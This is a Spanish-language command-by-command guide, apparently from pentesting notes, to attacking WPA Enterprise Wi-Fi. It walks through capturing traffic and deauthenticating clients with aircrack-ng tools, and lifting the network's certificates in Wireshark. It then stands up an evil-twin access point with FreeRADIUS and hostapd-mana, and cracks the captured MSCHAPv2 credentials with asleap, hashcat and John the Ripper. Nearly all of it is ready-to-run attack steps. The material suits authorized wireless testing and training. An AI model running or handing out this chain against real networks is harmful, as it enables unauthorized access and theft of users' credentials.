WPA Enterprise
1) Habilitar modo monitor en tarjeta inalámbrica.
sudo airmon-ng check kill && sudo airmon-ng start <interface> && iw dev <interface-mon> info
sudo airmon-ng check kill && sudo airmon-ng start wlan0 && iw dev wlan0mon info2) Captura de paquetes para identificar BSSID, ESSID y canal objetivo.
MGT = tipo de autenticación WPA Enterprise.
sudo airodump-ng <interface-mon>3) Captura de paquetes de BSSID, ESSID y canal específico.
sudo airodump-ng <interface-mon> --bssid <BSSID> --essid <ESSID> -c <channel> -w <file-name> --output-format pcapDesautenticación de cliente(s).
# Desautenticación dirigida
sudo aireplay-ng -0 1 -a <BSSID> -c <client-mac-address> <interface-mon>
# Desautenticación broadcast
sudo aireplay-ng -0 1 -a <BSSID> <interface-mon>4) Deshabilitar modo monitor en tarjeta inalámbrica.
sudo airmon-ng stop <interface-mon> && iw dev <interface> info
sudo airmon-ng stop wlan0mon && iw dev wlan0 info5) Obtención de certificados.
wireshark <file-name>.cap5.1) Aplicar filtro de visualización.
wlan.bssid==<bssid> && eap && tls.handshake.certificate5.2) Exportar y guardar certificados.
Extensible Authentication Protocol -> Transport Layer Security -> TLSvX Record Layer: Handshake Protocol: Certificate -> Handshake Protocol: Certificate -> Certificates
Clic derecho -> Export Packet Bytes -> guardar certificado con extensión
.der.
5.3) Obtener información del certificado y verificar su fecha de vencimiento.
openssl x509 -inform der -in <certificate-filename>.der -text | more
openssl x509 -in <certificate-filename>.der -noout -enddate6) Instalación de FreeRADIUS.
sudo apt install freeradius6.1) Configuración de certificado ca.cnf.
sudo -s
cd /etc/freeradius/3.0/certs
nano ca.cnf[certificate_authority]
countryName = <countryName>
stateOrProvinceName = <stateOrProvinceName>
localityName = <localityName>
organizationName = <organizationName>
emailAddress = <emailAddress>
commonName = <commonName>6.2) Configuración de certificado server.cnf.
sudo -s
cd /etc/freeradius/3.0/certs
nano server.cnf[server]
countryName = <countryName>
stateOrProvinceName = <stateOrProvinceName>
localityName = <localityName>
organizationName = <organizationName>
emailAddress = <emailAddress>
commonName = <commonName>6.3) Generación de certificados.
sudo -s
cd /etc/freeradius/3.0/certs
rm dh
makeSi ejecutamos make pero los certificados ya existen, no podremos sobrescribirlos. Tenemos que ejecutar make destroycerts para limpiar primero.
7) Instalación y configuración de hostapd-mana.
sudo apt install hostapd-mana7.1) Creación y configuración de archivo rogue-ap.conf.
sudo -s
cd /etc/hostapd-mana/
nano rogue-ap.conf7.2) Creación y configuración de archivo rogue-ap.eap_user.
sudo -s
cd /etc/hostapd-mana/
nano rogue-ap.eap_user8) Inicio de rogue access points.
sudo hostapd-mana /etc/hostapd-mana/rogue-ap.conf9) Cracking.
# asleap
asleap -C <challenge> -R <response> -W <path-wordlist>
# Hashcat
hashcat -m 5500 hash.txt <path-wordlist>
hashcat -m 5500 hash.txt --show
# John the Ripper
john --format=netntlm --wordlist=<path-wordlist> hash.txt
john --format=netntlm hash.txt --showÚltima actualización
¿Te fue útil?